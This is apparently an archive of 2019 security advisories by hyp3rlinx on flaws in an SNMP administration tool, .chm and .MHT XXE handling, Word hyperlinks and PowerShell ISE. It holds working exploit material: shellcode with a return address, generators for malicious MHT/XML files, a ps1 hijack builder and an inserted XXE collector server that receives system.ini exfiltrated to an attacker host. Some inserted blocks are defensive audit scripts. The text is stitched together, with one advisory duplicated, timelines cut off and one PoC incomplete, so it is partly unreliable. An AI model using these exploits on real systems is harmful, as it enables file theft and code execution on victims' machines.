SnmpSetup.195.15.EXE MD5 File Hash: a3913aae166c11ddd21dca437e78c3f4

The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.
This software is built on the TCP/IP industry standard SNMP (Simple Network Management Protocol).
Agents are built into the clients for remote management and configuration.


[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day


[CVE Reference]
CVE-2019-13577


[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated 
Remote Buffer Overflow via a long string to the CE Remote feature listening on 
Port 987.
This will overwrite data on the stack/registers and allow for control of the 
programs execution flow resulting in attacker supplied remote code execution.
Authentication is not required for this exploit.

This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.
When installing the vulnerable program, if it asks for a serial number just enter a value of "1" or something.
Upon launching the program, if any errors occur try right-clicking SnmpAdm.exe and running it as Admin.
Interestingly, it seems to drop DLLs with .tmp extensions in the AppData\Local\Temp directory; make OS system files viewable in Explorer to see them.

e.g. 

C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp

ASLR, Rebase and SafeSEH are all False for ipwSNMPv5.dll, which helps to make exploitation more portable.

CALL EBX
10008FB3   0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] 
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program 
Files (x86)\SnmpAdm\ipwSNMPv5.dll)

Stack dump:

EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII 
"AAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 0 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_NO_SCROLLBARS (05A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)



[Exploit/POC]
from socket import *
import struct,sys,argparse

#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec

#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

eip = struct.pack("<L", 0x10008FB3)   # CALL EBX in ipwSNMPv5.dll, from the mona output above

# parse_args() and main() are not preserved in this archived copy of the script
if not len(sys.argv) > 1:
    print "[*] No args supplied see Help -h"
    exit()
main(parse_args())





[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


[**Fixed Typo] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity

2019-07-16 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec  


[Vendor]
www.microsoft.com


[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft Compiled HTML Help is a Microsoft proprietary online help format, 
consisting of a collection of HTML pages, an index and other navigation tools.
The files are compressed and deployed in a binary format with the extension 
.CHM, for Compiled HTML. The format is often used for software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by 
Microsoft's HTML-based help program.


[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection


[CVE Reference]
N/A


[Security Issue]
CHM Files are usually created using Microsoft's "HTML Help Workshop" program. However, I found a way to bypass using this program and create them easily by
simply adding a double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it, processing any JS/HTML/XML inside etc.
Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files.

What's interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without
having to use the "hhctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.

While CHM is already considered a "dangerous" file type and other types of attacks have already been documented, I thought this was an interesting way to
create CHM files "Uncompiled", bypassing the default creation steps while stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.


[Exploit/POC]
1) python -m SimpleHTTPServer 81


2) "XXE.chm.chm"




Uncompiled CHM File XXE PoC





http://localhost:81/payload.dtd;>
%dtd;]>






3) "payload.dtd"  (hosted in python web-server dir port 81 above)


http://localhost:81?%file;'>">
%all;


Open the "XXE.chm.chm" file and it will exfiltrate the Windows "system.ini"; the attacker server IP is set to localhost on port 81 for the PoC.

Tested successfully Windows 7/10
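What the attacker-side listener on port 81 has to do, as an added example that is not the advisory's own code: serve `payload.dtd` and record the file that the `%file;` entity splices into the callback URL. The DTD is the standard out-of-band parameter-entity form whose last two lines survive above; the `file:///c:/windows/system.ini` URI follows the text, and percent-decoding the callback is an assumption about how the leaked bytes arrive. Because the leak rides inside a system identifier, a file containing characters the XML parser refuses there (or one too long for a single request) breaks the chain, which is why a short ini file is the usual demo target.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote

COLLECTOR = "http://localhost:81"               # the advisory's attacker URL
TARGET_FILE = "file:///c:/windows/system.ini"   # assumed URI for the system.ini the text exfiltrates

def build_dtd(target=TARGET_FILE, collector=COLLECTOR):
    """Out-of-band parameter-entity DTD: %file; is read from disk, then spliced into the
    system identifier of a second entity whose resolution carries it to the collector."""
    return ('<!ENTITY %% file SYSTEM "%s">\n'
            '<!ENTITY %% all "<!ENTITY send SYSTEM \'%s?%%file;\'>">\n'
            '%%all;\n') % (target, collector)

def exfiltrated_content(request_path):
    """Recover the leaked file from the callback's request line ('/?<percent-encoded bytes>')."""
    if "?" not in request_path:
        return None
    return unquote(request_path.split("?", 1)[1])

class Collector(BaseHTTPRequestHandler):
    """Serves payload.dtd and logs whatever the victim's parser sends back."""
    def do_GET(self):
        if self.path.startswith("/payload.dtd"):
            self._reply(build_dtd().encode(), "application/xml-dtd")
            return
        leaked = exfiltrated_content(self.path)
        if leaked is not None:
            print("[+] %s leaked %d bytes:\n%s" % (self.client_address[0], len(leaked), leaked))
        self._reply(b"", "text/plain")

    def _reply(self, body, ctype):
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

def serve(port=81):
    """Run the collector; binding port 81 needs elevated rights on most systems."""
    HTTPServer(("0.0.0.0", port), Collector).serve_forever()

if __name__ == "__main__":
    serve()
```

Start it where the advisory starts `SimpleHTTPServer`, then open the `.chm.chm`; the collector prints the decoded `system.ini` when the `send` entity is resolved.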


[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



Microsoft Word (2016) Deceptive File Reference ZDI-CAN-7949

2019-06-17 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
 

[Vendor]
www.microsoft.com


[Product]
Microsoft Word 2016


[Vulnerability Type]
Deceptive File Reference


[References]
ZDI-CAN-7949


[Security Issue]
When an MS Word ".docx" file contains a hyperlink to another file, Word runs the first file it finds in that directory with a valid extension,
but its Security warning dialog shows the end user an extension-less name, because another "empty" file with the same name as the target
executable, but no file extension, sits alongside it. Since the extension is suppressed, the target looks harmless and can be masked to appear
as just a folder etc.

This can potentially trick a user into running unexpected code, but it only works when an additional file of the same name with
NO extension is present.


[Exploit/POC]
1) Create a directory "PoC"

2) Create a folder in PoC directory named "Downloads Folder"

3) Create a .BAT file named "Downloads Folder.bat"

in the .BAT create some command like "start calc.exe"

4) Create an empty file named "Downloads Folder" with no file extension

5) Create the Word ".docx" file with a hyperlink pointing to "PoC/Downloads 
Folder/Downloads Folder"

Upon cl­icking the link, Word shows the user a vague dialog box asking whether they want to open the file. However, the prompt shows what
looks like a folder path, and no file extension (.exe, .com etc.) is visible or displayed to the end user.

Click the link to open what looks to be a folder and BOOM! the .BAT file runs instead.

Of course any executable will do, .EXE etc.
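An audit for the precondition laid out in the steps above, as an added example that is not part of the advisory: it reads the external hyperlink targets a .docx stores in `word/_rels/document.xml.rels` and flags any extension-less target that sits next to an executable of the same name. `build_poc_tree` recreates steps 1 to 5 in a temporary directory. The runnable-extension list is an assumption, and the test package written by `write_test_docx` contains only the relationships part, so Word itself would not open it.

```python
import os
import tempfile
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
# Extensions treated as runnable: an assumed list, extend it from PATHEXT on the host if needed.
EXEC_EXTS = {".exe", ".bat", ".cmd", ".com", ".scr", ".pif", ".vbs", ".js", ".ps1"}

def external_hyperlinks(docx_path):
    """External hyperlink targets of a .docx (they live in word/_rels/document.xml.rels)."""
    with zipfile.ZipFile(docx_path) as z:
        root = ET.fromstring(z.read("word/_rels/document.xml.rels"))
    return [unquote(r.get("Target", "")) for r in root.iter("{%s}Relationship" % REL_NS)
            if r.get("Type") == HYPERLINK_TYPE and r.get("TargetMode") == "External"]

def shadowed_executables(target, base_dir):
    """For an extension-less link target, the executables in that directory that share its name."""
    rel = target.replace("\\", "/").split("#", 1)[0]
    if rel.lower().startswith(("http:", "https:", "mailto:")) or os.path.splitext(rel)[1]:
        return []
    full = os.path.normpath(os.path.join(base_dir, rel))
    folder, name = os.path.dirname(full), os.path.basename(full).lower()
    if not os.path.isdir(folder):
        return []
    return sorted(f for f in os.listdir(folder)
                  if os.path.splitext(f)[0].lower() == name
                  and os.path.splitext(f)[1].lower() in EXEC_EXTS)

def audit_docx(docx_path):
    """{link target: [executables Word would really open]} for every deceptive link found."""
    base = os.path.dirname(os.path.abspath(docx_path))
    findings = {}
    for t in external_hyperlinks(docx_path):
        hits = shadowed_executables(t, base)
        if hits:
            findings[t] = hits
    return findings

def write_test_docx(path, target):
    """Only the part the audit reads; not a complete Word package (constructed for the test)."""
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
            'Target="%s" TargetMode="External"/></Relationships>' % (REL_NS, HYPERLINK_TYPE, target))
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)

def build_poc_tree(target="PoC/Downloads Folder/Downloads Folder"):
    """Recreate steps 1-5 of the PoC in a temp dir and return the .docx path."""
    root = tempfile.mkdtemp()
    folder = os.path.join(root, "PoC", "Downloads Folder")
    os.makedirs(folder)
    with open(os.path.join(folder, "Downloads Folder.bat"), "w") as f:
        f.write("start calc.exe\n")
    open(os.path.join(folder, "Downloads Folder"), "w").close()   # the extension-less decoy
    docx = os.path.join(root, "lure.docx")
    write_test_docx(docx, target)
    return docx

if __name__ == "__main__":
    print(audit_docx(build_poc_tree()))
```

Run `audit_docx` over documents arriving with their own directory tree (archives, shares); a link whose target has no extension but has an executable twin beside it is exactly the condition the steps above construct.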


[Network Access]
Local


[Severity]
High


[POC Video URL]
https://www.youtube.com/watch?v=irxkV_qGG9Y


[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program : 2019-01-25

Case officially contracted to ZDI : 2019-02-06

Vendor Disclosure : 2019-02-15
submitted to the vendor as ZDI-CAN-7949.

ZDI Response : "We have synced with the vendor and they have resolved that this 
case
does not meet the bar for security servicing. Therefore we will proceed to 
close it on our end."

2019-06-14 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution 0day

2019-05-01 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt
 
[+] ISR: ApparitionSec  
[+] Zero Day Initiative Program


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell ISE

The Windows PowerShell Integrated Scripting Environment (ISE) is a host 
application for Windows PowerShell.
In the ISE, you can run commands and write, test, and debug scripts in a single 
Windows-based graphic user interface.


[Vulnerability Type]
Filename Parsing Flaw Remote Code Execution 0day


[References]
ZDI-CAN-8005


[Security Issue]
Windows PowerShell ISE will execute wrongly supplied code when debugging 
specially crafted PowerShell scripts that contain
array brackets as part of the filename. This can result in ISE executing 
attacker supplied scripts pointed to by the filename
and not the "trusted" PS file currently loaded and being viewed by a user in 
the host application. This undermines the integrity of
PowerShell ISE allowing potential unexpected remote code execution.

In PowerShell brackets are used to access array elements.

PS C:\> $a=1..10
PS C:\> $a[4]
5

However, when brackets are used as part of the filename, they can be used to hijack the currently loaded file in place of another malicious file.
That file must be named with a single char that also appears inside the brackets of our specially crafted filename.

Requirements are that both files reside in the same directory. Example: if a file named [HelloWorldTutoria1].ps1 resides alongside a
file named 1.ps1, it creates a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L".

Other things I discovered playing with PS filenames: we can target scripts using 
a single alphabetic or numeric char and certain symbols.
PowerShell scripts with only a single quote also work; [Pwned'].ps1 will load 
and execute ===> '.ps1 if debugged from the vuln ISE application.

These chars also get the job done:
"$" "_" "#" "^"  plus any single case insensitive letter a-z or numbers 0-9, 
[Hello_World].ps1 > _.ps1

[Hello].ps1 will execute this instead => h.ps1

Dashes "-" throw the following error: "The specified wildcard character pattern 
is not valid: [Hello-World].ps1" when pointing to another PS file named -.ps1; 
the dash is being treated as a wildcard meta-character (inside a bracket 
expression it denotes a character range).

[pw3d].ps1 <= expected to execute

3.ps1 <= actually executed
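As an added example (not part of the advisory), a check a defender can run over a scripts directory: it translates a .ps1 filename containing PowerShell wildcard characters into the case-insensitive pattern ISE resolves, lists the sibling files that pattern also matches, and reports a descending range such as [Hello-World] as an invalid pattern. The directory listing is constructed from the filenames quoted above; no real files are touched.

```python
import os
import re

# PowerShell wildcard metacharacters; a script name containing any of them is
# resolved as a pattern, not as a literal filename.
WILDCARD_CHARS = set("[]*?")


def has_wildcard_chars(filename):
    """True if the script name contains a PowerShell wildcard metacharacter."""
    return any(ch in WILDCARD_CHARS for ch in filename)


def wildcard_to_regex(pattern):
    """Translate a PowerShell-style wildcard (* ? [set] [a-z]) into an anchored,
    case-insensitive regex. Returns None for an invalid pattern, e.g. the
    descending range in [Hello-World], which is the "wildcard character pattern
    is not valid" case the advisory describes."""
    out, i = [], 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "*":
            out.append(".*")
        elif ch == "?":
            out.append(".")
        elif ch == "[":
            end = pattern.find("]", i + 1)
            if end == -1 or end == i + 1:
                return None  # unterminated or empty bracket expression
            # keep '-' unescaped so ranges keep their meaning; escape the rest
            body = "".join(c if c == "-" else re.escape(c) for c in pattern[i + 1:end])
            out.append("[" + body + "]")
            i = end
        else:
            out.append(re.escape(ch))
        i += 1
    try:
        return re.compile("^" + "".join(out) + "$", re.IGNORECASE)
    except re.error:  # e.g. "bad character range o-W"
        return None


def hijack_candidates(script_name, sibling_names):
    """Sibling files that the wildcard form of script_name also resolves to, i.e.
    scripts ISE could run instead of the one on screen. Empty when the name has
    no wildcards; ValueError when the name is not a valid pattern."""
    if not has_wildcard_chars(script_name):
        return []
    rx = wildcard_to_regex(script_name)
    if rx is None:
        raise ValueError("invalid wildcard pattern: %s" % script_name)
    return sorted(n for n in sibling_names
                  if n.lower() != script_name.lower() and rx.match(n))


def scan_directory(path):
    """Report every wildcard-named .ps1 in a directory with its hijack
    candidates (None when the name is not a valid pattern)."""
    names = [n for n in os.listdir(path) if n.lower().endswith(".ps1")]
    report = {}
    for name in names:
        if has_wildcard_chars(name):
            try:
                report[name] = hijack_candidates(name, names)
            except ValueError:
                report[name] = None
    return report


# Constructed listing modelled on the filenames in the advisory (no real files).
SAMPLE_DIR = [
    "[HelloWorldTutoria1].ps1", "1.ps1",
    "[Hello_World].ps1", "_.ps1",
    "[Hello].ps1", "h.ps1",
    "[Pwned'].ps1", "'.ps1",
    "[pw3d].ps1", "3.ps1",
    "Deploy-Agent.ps1",
]

if __name__ == "__main__":
    for name in SAMPLE_DIR:
        if has_wildcard_chars(name):
            try:
                print("%-28s -> %s" % (name, hijack_candidates(name, SAMPLE_DIR)))
            except ValueError as exc:
                print("%-28s -> %s" % (name, exc))
```

Because matching is case-insensitive, [HelloWorldTutoria1].ps1 also resolves to h.ps1, which is why the check reports every sibling the pattern covers rather than a single one.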

This exploits the trust between PowerShell ISE and the end user. Scripts 
debugged locally or over a network share display "trusted" code in ISE that the 
user expects to run. However, when the user debugs the script, a different 
script gets executed.
Interestingly, that second script does NOT get loaded into PowerShell ISE upon 
execution, so a user may not see anything amiss.

User interaction is required for a successful attack to occur and obviously 
running any unknown PowerShell script can be dangerous.
Again, this exploit takes advantage of "trust": users can see and read the 
code and will trust it, as everything looks just fine, and
yet ... still they get PWNED!

Tested successfully on Win7/10

Long live user interaction! lol...


[POC Video URL]
https://www.youtube.com/watch?v=T2I_-iUPaFw


[Exploit/POC]
After opening the PS files in ISE, set the execution policy so you can test 
without issues.
set-executionpolicy unrestricted -force

PS scripts on network shares may hit a 'RemoteSigned' execution policy error, so 
run the command below.

set-executionpolicy unrestricted -force process
Choose 'R' to run once.

The Python script below will create two .ps1 files to demonstrate the vulnerable 
condition.
Examine the code. What does it say? It reads... Write-Output "Hello World!"... 
now run it...

BAM! The other PS script executes!


#PowerShell ISE 0day Xploit
#ZDI-CAN-8005
#ZDI CVSS: 7.0
#hyp3rlinx
#ApparitionSec
#Python 2 script (print statement, str written in binary mode)


fname1="[HelloWorldTutoria1].ps1"   #Expected code to run is 'HelloWorld!'
fname2="1.ps1"                      #Actual code executed is calc.exe for PoC
evil_code="start calc.exe"          #Edit to suit your needs.
c=0
payload1='Write-Output "Hello World!"'
payload2=evil_code+"\n"+'Write-Output "Hello World!"'

def mk_ps_hijack_script():
    #writes fname1/payload1 on the first call and fname2/payload2 on the
    #recursive second call, looking both up by name in the module globals
    global c
    c+=1
    f=open(globals()["fname"+str(c)],"wb")
    f.write(globals()["payload"+str(c)])
    f.close()
    if c<2:
        mk_ps_hijack_script()


if __name__=="__main__":
    mk_ps_hijack_script()
    print "PowerShell ISE Xploit 0day Files Created!"
    print "Discovery by hyp3rlinx"
    print "ZDI-CAN-8005"



[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
ZDI Case opened : 2019-02-06

[**UPDATED] Microsoft Internet Explorer v11 / XML External Entity Injection 0day

2019-04-11 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
Microsoft Internet Explorer v11
(latest version)

Internet Explorer is a series of graphical web browsers developed by Microsoft 
and included in the Microsoft Windows line of operating systems, starting in 
1995.


[Vulnerability Type]
XML External Entity Injection



[CVE Reference]
N/A



[Security Issue]
Internet Explorer is vulnerable to an XML External Entity attack if a user opens 
a specially crafted .MHT file locally.

This can allow remote attackers to potentially exfiltrate local files and 
conduct remote reconnaissance on locally installed program version information. 
For example, a request for "c:\Python27\NEWS.txt" can return version 
information for that program.

Upon opening the malicious ".MHT" file locally it should launch Internet 
Explorer. Afterwards, user interactions like duplicating the tab ("Ctrl+K") 
or the right-click "Print Preview" or "Print" commands on the web page may 
also trigger the XXE vulnerability.

However, a simple call to the window.print() JavaScript function should do the 
trick without requiring any user interaction with the web page.
Importantly, if files are downloaded from the web in a compressed archive and 
opened using certain archive utilities, MOTW (mark of the web) may not work as 
advertised.

Typically, when instantiating ActiveX objects like "Microsoft.XMLHTTP" users 
will get a security warning bar in IE and be prompted to activate blocked 
content. However, when opening a specially crafted .MHT file using malicious 
markup tags the user will get no such active content or security bar warnings.

e.g.

C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -


Tested successfully in latest Internet Explorer Browser v11 with latest 
security patches on Win7/10 and Server 2012 R2.



[POC/Video URL]
https://www.youtube.com/watch?v=fbLNbCjgJeY



[Exploit/POC]
PoC to exfiltrate the Windows "system.ini" file.
Note: Edit the attacker server IP in the script to suit your needs.

1) Use below script to create the "datatears.xml" XML and XXE embedded 
"msie-xxe-0day.mht" MHT file.

2) python -m SimpleHTTPServer

3) Place the generated "datatears.xml" in Python server web-root.

4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated.


#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx 
#ApparitionSec

ATTACKER_IP="localhost"
PORT="8000"

mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'

'http://www.w3.org/TR/html4/transitional.dtd;>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)

xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)

def mk_msie_0day_filez(f,p):
    f=open(f,"wb")
    f.write(p)
    f.close()


if __name__ == "__main__":
    mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
    mk_msie_0day_filez("datatears.xml",xml_file)
    print "Microsoft Internet Explorer XML External Entity 0day PoC."
    print "Files msie-xxe-0day.mht and datatears.xml Created!."
    print "Discovery: Hyp3rlinx / Apparition Security"




[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019 
Case Opened: March 28, 2019
MSRC response April 10, 2019: "We determined that a fix for this issue will be 
considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix 
for this issue, and we have closed this case."
April 10, 

Microsoft Internet Explorer v11 XML External Entity Injection 0day

2019-04-11 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
Microsoft Internet Explorer v11
(latest version)

Internet Explorer is a series of graphical web browsers developed by Microsoft 
and included in the Microsoft Windows line of operating systems, starting in 
1995.


[Vulnerability Type]
XML External Entity Injection



[CVE Reference]
N/A



[Security Issue]
Internet Explorer is vulnerable to an XML External Entity attack if a user opens 
a specially crafted .MHT file locally.

This can allow remote attackers to potentially exfiltrate local files and 
conduct remote reconnaissance on locally installed program version information. 
For example, a request for "c:\Python27\NEWS.txt" can return version 
information for that program.

Upon opening the malicious ".MHT" file locally it should launch Internet 
Explorer. Afterwards, user interactions like duplicating the tab ("Ctrl+K") 
or the right-click "Print Preview" or "Print" commands on the web page may 
also trigger the XXE vulnerability.

However, a simple call to the window.print() JavaScript function should do the 
trick without requiring any user interaction with the web page.
Importantly, if files are downloaded from the web in a compressed archive and 
opened using certain archive utilities, MOTW (mark of the web) may not work as 
advertised.

Typically, when instantiating ActiveX objects like "Microsoft.XMLHTTP" users 
will get a security warning bar in IE and be prompted to activate blocked 
content. However, when opening a specially crafted .MHT file using malicious 
markup tags the user will get no such active content or security bar warnings.

e.g.

C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -


Tested successfully in latest Internet Explorer Browser v11 with latest 
security patches on Win7/10 and Server 2012 R2.



[POC/Video URL]
https://vimeo.com/329717404



[Exploit/POC]
PoC to exfiltrate the Windows "system.ini" file.
Note: Edit the attacker server IP in the script to suit your needs.

1) Use below script to create the "datatears.xml" XML and XXE embedded 
"msie-xxe-0day.mht" MHT file.

2) python -m SimpleHTTPServer

3) Place the generated "datatears.xml" in Python server web-root.

4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated.


#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx 
#ApparitionSec

ATTACKER_IP="localhost"
PORT="8000"

mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'

'http://www.w3.org/TR/html4/transitional.dtd;>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'

'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)

xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)

def mk_msie_0day_filez(f,p):
    f=open(f,"wb")
    f.write(p)
    f.close()


if __name__ == "__main__":
    mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
    mk_msie_0day_filez("datatears.xml",xml_file)
